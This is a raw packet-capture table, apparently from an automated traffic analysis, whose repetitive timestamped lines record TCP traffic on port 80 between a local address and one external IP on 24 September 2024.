                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420011044 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420025110 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420027018 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420068979 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420104980 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420116901 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420130968 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420145988 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420160055 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420161009 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420176029 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420181990 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420206070 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420243979 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420245886 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420284033 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420320988 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420325041 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420334101 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420378923 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420931101 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420945883 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420962095 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420970917 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.420989037 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421015978 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421049118 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421063900 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421077967 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421087980 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421093941 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421125889 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421150923 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421188116 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421202898 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421217918 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421231985 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421235085 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421247959 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421262980 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421277046 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421288967 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421329975 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421864986 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421904087 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421926022 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421941996 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421963930 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.421984911 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422024012 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422039032 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422053099 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422068119 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422070980 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422106028 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422127008 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422162056 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422175884 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422197104 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422204971 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422213078 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422228098 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422229052 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422261953 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422291040 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422292948 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422313929 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422337055 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422358036 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422847986 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422889948 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422894001 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422916889 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422954082 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.422954082 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423000097 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423017025 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423031092 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423051119 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423067093 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423079967 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423111916 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423132896 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423147917 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423168898 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423172951 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423198938 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423223972 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423252106 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423266888 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423280954 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423295975 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423331976 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423346043 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423372030 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423614979 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423644066 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423657894 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423662901 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423681021 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423706055 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423753977 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423768044 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423782110 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423796892 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423800945 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423841000 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423852921 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423875093 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423890114 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423921108 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.423944950 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424021006 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424035072 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424050093 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424062967 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424063921 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424079895 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424094915 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424097061 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424109936 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424125910 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424127102 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424202919 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424202919 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424555063 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424593925 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424602032 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424609900 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424638033 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424663067 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424688101 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424704075 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424731016 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.424756050 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.438561916 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.438577890 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.438591957 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.438643932 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.438677073 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.438682079 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.438697100 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.438711882 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.438723087 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.438726902 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.438750029 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.438775063 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.442845106 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.442862034 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.442877054 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.442917109 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.442931890 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.442939043 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.442975998 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.442984104 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.442991018 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.443025112 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.481947899 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.481962919 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482006073 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482026100 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482048988 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482057095 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482069016 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482070923 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482093096 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482114077 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482115030 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482157946 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482157946 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482172966 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482194901 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482215881 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482270002 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482290030 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482310057 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482311010 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482331991 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482331991 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482356071 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482376099 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482388973 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482407093 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482433081 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482459068 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482465982 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482485056 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482506990 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482511044 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482522011 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482534885 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482563972 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482577085 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482606888 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482614040 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482640982 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482652903 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482660055 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482680082 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482691050 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482700109 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482722044 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482727051 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482762098 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482808113 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482830048 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482851028 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482882023 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482899904 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482907057 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482922077 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482928991 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482944012 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482964039 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482964039 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.482989073 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483031034 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483050108 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483072996 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483076096 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483088970 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483098984 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483113050 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483115911 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483130932 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483139038 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483154058 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483160973 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483182907 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483202934 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483444929 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483465910 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483484030 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483491898 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483506918 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483510971 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483524084 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483531952 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483550072 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483552933 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483572006 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483573914 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483596087 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483608007 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483616114 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483623028 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483645916 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483648062 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483669043 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483669996 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483686924 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483692884 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483710051 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483712912 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483733892 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483740091 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483756065 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483764887 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483779907 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483784914 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483805895 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483808041 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483829021 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483844042 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483844042 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483850956 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483870029 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483881950 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483891964 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483896017 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483922005 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:30.483941078 CEST4973580192.168.2.8103.130.147.211
